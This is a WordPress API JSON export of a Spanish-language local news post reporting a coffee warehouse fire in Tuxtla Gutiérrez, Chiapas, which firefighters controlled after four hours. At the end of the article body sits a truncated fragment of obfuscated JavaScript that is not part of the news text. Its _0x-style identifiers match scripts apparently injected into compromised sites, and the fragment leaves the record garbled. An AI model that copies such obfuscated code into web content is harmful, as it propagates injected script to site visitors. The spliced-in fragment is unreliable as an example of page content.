{"id":8329,"date":"2023-01-26T04:51:08","date_gmt":"2023-01-26T04:51:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8329"},"modified":"2023-01-26T04:51:08","modified_gmt":"2023-01-26T04:51:08","slug":"se-quema-bodega-de-cafe-en-la-zona-sur-oriente-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8329","title":{"rendered":"Se quema bodega de caf\u00e9 en la zona Sur Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"406\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674708604372.jpg\" alt=\"\" class=\"wp-image-8330\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674708604372.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/FB_IMG_1674708604372-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 25 de enero del 2023. Tuxtla Guti\u00e9rrez.- Cerca del mediod\u00eda de este mi\u00e9rcoles se incendi\u00f3 una bodega de caf\u00e9 localizada en la zona Oriente Sur de la capital chiapaneca.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando este espacio de manera repentina comenz\u00f3 a incendiarse por motivos desconocidos.<\/p>\n\n\n\n<p>Fueron los mismos comercios colindantes los que reportaron a los n\u00fameros de emergencias este siniestro.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Bomberos, de Protecci\u00f3n Civil Municipal y Estatal para atacar el incendio con equipo espec\u00edfico.<\/p>\n\n\n\n<p>Despu\u00e9s de cuatro horas lograron controlar el incendio que amenazaba con expandirse a los comercios aleda\u00f1os<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que hubo p\u00e9rdidas materiales de consideraci\u00f3n y que se quemaron costales vac\u00edos, no hab\u00eda producto almacenado en ese momento.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 25 de enero del 2023. Tuxtla Guti\u00e9rrez.- Cerca del mediod\u00eda de este mi\u00e9rcoles se incendi\u00f3 una bodega de caf\u00e9 localizada en la zona Oriente Sur de la capital chiapaneca. De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando este espacio de manera repentina comenz\u00f3 a incendiarse por motivos desconocidos. Fueron &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8330,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-8329","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8329","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8329"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8329\/revisions"}],"predecessor-version":[{"id":8331,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8329\/revisions\/8331"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8330"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8329"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8329"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8329"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}